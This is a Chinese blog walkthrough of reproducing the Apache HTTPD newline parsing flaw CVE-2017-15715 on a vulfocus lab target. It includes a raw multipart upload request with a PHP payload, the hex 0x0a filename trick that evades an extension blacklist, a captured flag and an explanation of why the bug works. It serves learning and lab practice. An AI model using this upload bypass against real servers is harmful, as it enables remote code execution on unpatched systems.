cve-2017-15715复现

最新推荐文章于 2024-09-12 18:50:22 发布
最新推荐文章于 2024-09-12 18:50:22 发布
阅读量414 收藏 4
点赞数 2
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63615772/article/details/141179458
版权

用的是 vulfocus在线靶场

image-20240814053401178

抓包发现是空页面

image-20240814053545491

image-20240814053837763

发现响应包内容

HTTP/1.1 200 OK
Date: Tue, 13 Aug 2024 21:35:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.5.38
Content-Length: 0
Connection: close
Content-Type: text/html

存在apache解析漏洞 这里版本是 apache/2.4.10

可以绕过黑名单

构造POST响应包

POST / HTTP/1.1
Host: 123.58.224.8:33729
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9552222486401230933854482358
Content-Length: 359
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------9552222486401230933854482358
Content-Disposition: form-data; name="file"; filename="3.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------9552222486401230933854482358
Content-Disposition: form-data; name="name"

3.php
-----------------------------9552222486401230933854482358--

image-20240814054141542

发现文件上传失败

image-20240814054204482

image-20240814054218122

将文件名改成1.phpa 则上传成功 因此确定存在文件上传解析漏洞点

将hex编码中将 a的编码改成0a 上传文件成功

image-20240814054522035

image-20240814055233265

复现成功

image-20240814055338109

	flag-{bmh40f80a7c-89a6-4b05-9ff7-b86df273ffd3}

原理讲解

1.php不能上传

因为黑名单上有php

如果我们把名字改成phpa 就发现可以上传文件

但是我们就算上传成功phpa也没有用因为 phpa 无法解析成php文件

但是1.php%0a会被解析

因为

在php中有这个配置

<FilesMatch \.php$>
    SetHandler application/x-httpd-php
</FilesMatch>

只要满足这么一个正则匹配,就会告知Apache将这个满足匹配的文件按PHP文件来解析

但是不巧的是这里还有一个东西就是$这个东西,它是用来匹配字符串结尾位置的,而且如果设置了RegExp 对象(正则表达式)的 Multiline(/m) 属性,则 $ 也匹配 ‘\n’ 或 ‘\r’。

所以如果我们设置了RegExp 对象的 Multiline 属性(\m)的条件下,$还会匹配到字符串结尾的换行符(也就是%0a),于是也就产生了这么一个换行解析漏洞

上面的意思就是说0a也是会被匹配到的 即1.php%0a也是可以上传的

但是在post中 %0a 会被当做换行符 即上传后的文件

注意

这里有一点需要注意,我们不能直接在1.php文件名后面加上%0a,因为Get传参他是有URL的编码解码的,但是我们这里是POST传参

所以要在hex上改

如将1.phpa 中的a hex 61改成 0a 会变成 1.php 换行看不到

我们这个时候只要访问 ip:1.php%0a 就可以了

参考

https://www.freebuf.com/vuls/270633.html

POST传参


所以要在hex上改

如将1.phpa   中的a hex 61改成 0a 会变成 1.php 换行看不到

我们这个时候只要访问 ip:1.php%0a 就可以了  

参考

https://www.freebuf.com/vuls/270633.html
k大帅1
关注
CVE-2017-15715
天天学安全专属博客
07-18 1078
Apache HTTPD 换行解析漏洞(CVE-2017-15715
Apache换行解析漏洞复现CVE-2017-15715
weixin_57379923的博客
08-04 738
靶机:由 centos7 搭建的 vulhub,IP:192.168.100.40。浏览器访问上传的文件在文件名后添加 %0a 进行访问。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!作 者:PeiyuJue。
05 - vulhub - Apache HTTPD 换行解析漏洞(CVE-2017-15715
易编橙 · 终身成长社群,相遇已是上上签!
10-14 711
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,`1.php\x0A`将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
中间件漏洞复现Apache httpd(CVE-2017-15715
最新发布
2301_78533452的博客
09-12 245
Apache httpd 换行解析漏洞(CVE-2017-15715)Apache httpd是一款http服务器,其2.4.0~2.4.29版本中存在一个解析漏洞。在php解析时,将被按照PHP后缀进行解析,直接导致绕过某些安全策略。
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
CVE-2017-1002101:突破隔离访问宿主机文件系统1
08-03
"Kubernetes 中的 CVE-2017-1002101 漏洞:突破隔离访问宿主机文件系统1" Kubernetes 是一个开源的容器编排系统,用于自动部署、扩展和管理容器化应用程序。然而,Kubernetes 也存在一些安全漏洞,CVE-2017-1002101...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
Apache解析漏洞 CVE-2017-15715
m0_62284238的博客
09-10 342
进入vulnhub目录下的httpd目录,进入CVE-2017-15715目录。Apache禁止上传php文件,但是可以添加%0A换行符进行绕过。使用burpsuite抓包后改后缀为.php%0A。Apache是世界使用率排名第一的web服务器。上传成功后又会被Apache当作php文件解析。访问靶机的8080端口。出现如下即为开启成功!docker-compoe启动漏洞环境。直接上传.php文件会被拦截。上传一个后缀为phpa的文件。上传成功并且成功被解析!
Apache解析漏洞CVE-2017-15715
qq_61702710的博客
07-16 721
Apache HTTPD是一款 HTTP 服务器,它可以通过 mod_php 来运行 PHP 网页。其 2.4.0~2.4.29 版本中存在一个解析漏洞,在解析PHP 时, 1.php\x0a 将被按照 PHP 后缀进行解析,导致绕过一些服务器的安全策略。
【漏洞复现-Apache-文件上传】vulfocus/apache-cve_2017_15715
10-09 3192
【Apache-文件上传】
Apache换行解析漏洞CVE-2017-15715
qq_43665434的博客
05-10 797
Apache换行解析漏洞CVE-2017-15715 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击机(burp) 192.168.1.120 实验过程 启动centos8靶机,搭建漏洞环境: #开启docker service docker start #进入cve-2017-15715目录 cd /usr/sbin/vulhub/httpd/cve-2017-15715 #启动漏洞环境 docker-compose
Apache 解析漏洞(CVE-2017-15715)
weixin_46239998的博客
12-30 513
五、修改(在70和0d之间加入0a)七、用哥斯拉连接,getshell。
Apache HTTPD 换行解析漏洞(CVE-2017-15715
spring!
03-08 4531
Apache HTTPD 换行解析漏洞(CVE-2017-15715)|vulhub
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
黑白的博客
12-21 540
声明 好好学习,天天向上 漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 CVE-2017-7504漏洞与CVE-2015-7501的漏洞如出一辙,只是利用的路径稍微出现了变化,CVE-201
cve-2017-15715漏洞复现
03-16
cve-2017-15715漏洞是一个Apache Struts2框架中的远程代码执行漏洞。攻击者可以通过构造特定的HTTP请求,利用漏洞执行任意代码,进而控制服务器。 要复现该漏洞,需要先搭建一个漏洞环境。可以下载Apache Struts2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值